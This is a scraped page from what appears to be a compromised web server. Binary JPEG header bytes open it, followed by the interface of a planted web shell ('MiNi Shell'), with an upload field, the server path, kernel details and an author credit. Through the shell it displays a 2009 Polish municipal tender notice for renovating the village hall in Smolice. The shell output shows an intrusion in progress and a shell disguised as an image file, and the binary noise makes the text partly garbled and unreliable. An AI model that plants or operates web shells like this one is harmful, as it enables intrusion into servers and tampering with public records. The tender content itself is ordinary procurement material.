JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090327/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090327/81576-N-2009.html

<p class="kh_header"><b>Stryków: Remont świetlicy wiejskiej w Smolicach</b><br>
<b>Numer ogłoszenia: 81576 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto-Gmina Stryków , ul. Kościuszki 27, 95-010 Stryków, woj. łódzkie, tel. 042 7198002, faks 042 7198193.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strykow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy wiejskiej w Smolicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac do wykonania					
								
I.	Roboty rozbiórkowe					
1.	Wykucie drzwi dwuskrzydłowych o pow. ponad 2 m2			m2	7,75	
2.	Wykucie okna					szt	1	
3.	Wykucie otworu w ścianie wewnętrznej 25 cm z cegły		m3	0,33	
4.	Wykucie w ścianie wewn. gr. 12 cm otworu drzwiowego		m3	0,22	
								
II.	Roboty murowe						
1.	Wykonanie ścianek działowych pełnych z bet. komórkowego gr. 12 cm		m2	8,0	
								
III.	Montaż stolarki drzwiowej z samozamykaczami i zamkami			
1.	Montaż drzwi wewn. alum. jednoskrzydłowych przeszklonych w 2/3 powierzchni	m2	1,85	
2.	Montaż drzwi wewn. alum. dwuskrzydłowych przeszklonych w 2/3 powierzchni	m2	2,9	
3.	Montaż drzwi zewn. alum. dwuskrzyd. pełnych z naświetlem (szkło bezpieczne)	m2	4,95	
4.	Montaż skrzydeł., łazienkowych 80 w kolorze brązowym		szt.	2	
5.	Montaż skrzydła, pełnego 80 w kolorze brązowym		szt.	1	
6.	Montaż skrzydła, pełnego 90 w kolorze brązowym		szt.	1	
7.	Montaż ościeżnicy stalowej w ścianie wewn. szer. 80		szt.	1	
								
IV.	Podkłady i posadzki					
1.	Grys z klińcem gr. 15 cm				m2	106,5	
2.	Piasek stabilizowany cementem gr. 10cm 			m2	106,5	
3.	Płyta żelbetowa zbrojona siatką O 10 co 20 cm gr. 10 cm		m2	106,5	
4.	Papa asfaltowa na lepiku 2 razy				m2	169,5	
5.	Styropian twardy 40 kg/m3 gr. 80 mm			m2	169,5	
6.	Wylewka betonowa zbrojona siatką gr. 5 cm		m2	169,5	
7.	Wykładzina rulonowa PCV, heterogeniczna o klasie ścieralności minimum 33, klejona o
	złączach spawanych z wywijanymi cokolikami na wysokość 10 cm		m2	133,5	
8.	Posadzka z płytek gresowych o grubości min. 8 mm  i o klasie ścieralności minimum IV									m2	36,0	
9.	Cokoliki gresowe wysokości 10 cm			m	35,0	
								
V.	Okładziny ścian						
1.	Płytki ścienne glazurowane				m2	27,5	
2.	Płyty gipsowo - kartonowe 				m2	110,0	
3.	Dwukrotne malowanie farbą emulsyjną płyt GK		m2	110,0	
4.	Boazeria z paneli PCV na ruszcie drewnianym na wys. 2,6 m		m2	135,3	
5.	Listwy przypodłogowe				m	5,8	
								
VI.	Sufity podwieszane					
1.	Sufity podwieszane na ruszcie metalowym z płyt gips. - kartonowych		m2	164,6	
2.	Paroizolacja z folii polietylenowej			m2	164,6	
3.	Izolacja cieplna na stropie z wełny mineralnej gr. 40 mm		m2	164,6	
								
VII.	Podposadzkowa instalacja c.o.				
1.	Rurociągi z polipropylenu w tulejach ochronnych o 25 mm		m	90	
2.	Rurociągi z polipropylenu w tulejach ochronnych o 20 mm		m	50	
3.	Próba wodna rurociągów				m	140	
								
VIII. Wymiana instalacji elektrycznej	
1.	Wykucie bruzd w ścianach z cegły dla przewodów wtynkowych		m	48,0	
2.	Ułożenie przewodów YDY 3x1,5 bez zaprawiania bruzd		m	220,0	
3.	Ułożenie przewodów YDY 3x2,5 bez zaprawiania bruzd		m	80,0	
4.	Montaż na gotowym podłożu puszek bakielitowych 60 mm		szt.	40,0	
5.	Wymiana podtynkowych gniazd wtyczkowych do 16 A		szt.	28,0	
6.	Montaż na gotowym podłożu łączników instal. dwubiegunowych		szt.	10,0	
7.	Montaż w sufitach podwieszanych opraw oświetleniowych		szt.	17,0	
8.	Montaż kinkietowych opraw oświetleniowych		szt.	11,0	
9.	Montaż złącza pomiarowego wyposażonego w zabezpieczenie przedlicznikowe			
	i w tablicę licznikową z zabezpieczeniem głównym		kpl	1,0	
10.	Montaż rozdzielnicy obwodowej				kpl	1,0	
11.	Wykonanie pomiarów				kpl	1,0	
								
IX.	Instalacje sanitarne					
1.	Montaż umywalki porcelitowej 45 cm z syfonem i baterią		kpl	1	
2.	Montaż ustępów kompaktowych				kpl	2	
3.	Podłączenie w/w urządzeń do istniejących instalacji wody zimnej i kanalizacji	kpl	1	
4. 	Wykonanie wentylacji mechanicznej w WC i kuchni 		kpl 	4
5. 	Montaż wyciągowego okapu kuchennego z kanałem wylotowym 		kpl	1
								
X.	Roboty towarzyszące					
1.	Impregnacja więźby dachowej preparatami bakteriobójczymi		kpl	1	
2. 	Wywóz gruzu i odpadów na wysypisko.				
								
Podane w zakresie robót wartości liczbowe są wartościami orientacyjnymi, a podstawą do oszacowania wartości robót przez Wykonawcę powinny być jego obmiary podczas wizji lokalnej świetlicy w Smolicach.
Wykonawca dostarcza wszystkie materiały niezbędne do wykonania przedmiotu zamówienia. Wszystkie materiały wbudowane przez Wykonawcę muszą spełniać wymogi ustawy O wyrobach budowlanych (Dz. U. 2004.92.881) oraz ustawy Prawo budowlane (Dz. U. 06.156.1118).

Oznaczenie wg CPV:  45.00.00.00-7 - roboty budowlane 

1. Koszty związane z realizacją inwestycji: zabezpieczenia terenu budowy, utrzymania go w należytym stanie technicznym a także koszt zorganizowania zaplecza budowy ponosi Wykonawca. 
2. Wykonawca zobowiązany jest do pokrycia ewentualnych szkód powstałych w czasie realizacji zadania. 
Wykonawca może powierzyć część zamówienia podwykonawcy/om z tym, że Zamawiający żąda wskazana w ofercie części zamówienia, która zostanie powierzona podwykonawcy/om..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, objętej przedmiotem niniejszego zamówienia, 
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj. 
a)	w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonali z należytą starannością co najmniej 2 zamówienia polegające na remoncie budynku, w tym jeden budynek użyteczności publicznej i o wartości każdej z wykazanych robót minimum 100 000,00 zł, słownie: sto tysięcy złotych zero groszy.
b)	dysponują osobami zdolnymi do wykonania zamówienia w tym minimum:
- 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
- 1 osobą  posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
- 1 osobą posiadającą uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
Do wykazu należy dołączyć dokumenty potwierdzające posiadane uprawnień w specjalnościach w/w oraz aktualne potwierdzenie przynależności do właściwej Izby samorządu zawodowego - aktualne na dzień składania ofert.  
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
- posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności ważne co najmniej w dniu składania ofert, 
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2 Pzp.
Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty. Wykonawca musi wykazać spełnienie każdego z warunków. Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty:
1.1.	formularz ofertowy - załącznik nr 1,
1.2.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.3.	dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych, pełnomocnictwo, 
1.4.	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.5.	oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 i art. 24 ust 1 i 2 ustawy Prawo zamówień publicznych - załącznik nr 2a,
1.6.	oświadczenie o niezaleganiu - załącznik nr 2b,
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie, oraz dysponuje lub będzie dysponował potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca składa następujące dokumenty:
2.1.	wykaz osób, które będą wykonywać zamówienie, ze wskazaniem w ofercie części zamówienia, której wykonanie powierzy podwykonawcom - według załącznika nr 6,
2.2.	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia:
2.2.1.	1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
2.2.2.	1 osobą  posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
2.2.3.	1 osobą posiadającą uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
Do wykazu należy dołączyć dokumenty potwierdzające posiadane uprawnień w specjalnościach w/w oraz aktualne potwierdzenie przynależności do właściwej Izby samorządu zawodowego - aktualne na dzień składania ofert.  
	Zamawiający zgodnie z art. 22 ust 1 pkt. 2 ustawy Prawo zamówień publicznych uzna warunek za spełniony jeżeli Wykonawca przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał takie osoby.
2.3.	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca - według załącznika nr 5,
Zamawiający zgodnie z art. 22 ust 1 pkt. 2 ustawy Prawo zamówień publicznych uzna warunek za spełniony jeżeli Wykonawca przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia narzędzi i urządzeń.
2.4.	Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonali z należytą starannością co najmniej 2 zamówienia polegające na remoncie budynku, w tym jeden budynek użyteczności publicznej i o wartości każdej z wykazanych robót minimum 100 000,00 zł, słownie: sto tysięcy złotych zero groszy, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (referencje) - według załącznika nr 7 - Wykonawca potwierdzi spełnianie warunków jeśli wykaz będzie zawierał co najmniej 2 wykonane  w/w roboty.
3. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, składa następujące dokumenty:
3.1.	polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, ważną co najmniej w dniu składania ofert, 
4. Inne wymagane dokumenty:
4.1.	wykaz osób do kontaktów z Zamawiającym odpowiedzialnych za wykonanie zobowiązań umowy - załącznik nr 3,
4.2.	zaakceptowany wzór umowy stanowiący załącznik nr 4.
4.3.	kosztorys ofertowy,
5. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej 
5.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 9 ust. 1 pkt 1.2. i 1.4.  składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
3)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Dokumenty pkt 1 i 2 powinny być wystawione nie wcześniej niż 6 miesięcy a pkt 3 nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 9 ust. 5 pkt 5.1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.strykow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta - Gminy Stryków, ul. Kościuszki 27, 95-010 Stryków, pok. 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 09:30, miejsce: Urząd Miasta - Gminy Stryków, ul. Kościuszki 27, 95-010 Stryków, pok. 2 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com